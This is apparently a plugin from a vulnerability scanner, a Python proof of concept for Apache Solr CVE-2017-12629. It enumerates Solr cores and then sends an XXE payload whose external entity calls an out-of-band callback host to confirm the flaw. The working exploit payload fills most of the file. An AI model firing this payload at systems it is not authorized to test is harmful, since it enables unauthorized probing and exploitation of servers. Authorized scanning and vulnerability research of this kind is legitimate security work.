#!/usr/bin/env python3
# @Time    : 2020-05-03
# @Author  : caicai
# @File    : poc_solr_cve-2017-12629-xxe_2017.py

from myscan.lib.helper.request import request  # 修改了requests.request请求的库，建议使用此库，会在redis计数
from myscan.config import scan_set
import re
from myscan.lib.parse.response_parser import response_parser
from myscan.lib.core.common_reverse import generate_reverse_payloads, query_reverse


class POC():
    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # python的dict数据，详情请看docs/开发指南Example dict数据示例
        self.url = workdata.get("data")  # self.url为需要测试的url，值为目录url，会以/结尾,如https://www.baidu.com/home/ ,为目录
        self.result = []  # 此result保存dict数据，dict需包含name,url,level,detail字段，detail字段值必须为dict。如下self.result.append代码
        self.name = "solr cve-2017-12629 xxe"
        self.vulmsg = "referer:https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE"
        self.level = 2  # 0:Low  1:Medium 2:High

    def verify(self):
        # 根据config.py 配置的深度，限定一下目录深度
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return
        req = {
            "method": "GET",
            "url": self.url + "solr/admin/cores?wt=json",
            "headers": self.dictdata.get("request").get("headers"),  # 主要保留cookie等headers
            "timeout": 10,
            "allow_redirects": False,
            "verify": False,
        }
        r = request(**req)
        if r != None and r.status_code == 200 and b"responseHeader" in r.content:
            name = re.search('"name":"(.*?)"', r.text)
            if name:
                name = name.group(1)
                reverse_data = generate_reverse_payloads("solr_xxe")
                url = reverse_data[0][0].split(" ", 1)[1]
                req["url"] = self.url + '''solr/{name}/select?q=<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "{url}">
%remote;]>
<root/>&wt=xml&defType=xmlparser'''.format(name=name, url=url)
                r1 = request(**req)
                query_res,data=query_reverse(reverse_data[1])
                if query_res:
                    request_ = ""
                    response_ = ""
                    if r1 != None:
                        parser_ = response_parser(r1)
                        request_ = parser_.getrequestraw()
                        response_ = parser_.getresponseraw()
                    self.result.append({
                        "name": self.name,
                        "url": self.url,
                        "level": self.level,  # 0:Low  1:Medium 2:High
                        "detail": {
                            "payload": req["url"].encode(),
                            "vulmsg": self.vulmsg,
                            "request": request_,
                            "response": response_
                        }
                    })
                else:
                    self.result.append({
                        "name": self.name,
                        "url": self.url,
                        "level": 0,  # 0:Low  1:Medium 2:High
                        "detail": {
                            "payload": req["url"].encode(),
                            "vulmsg": "target open solr ,target :{}".format(self.url + "solr/admin/cores?wt=json"),

                        }
                    })
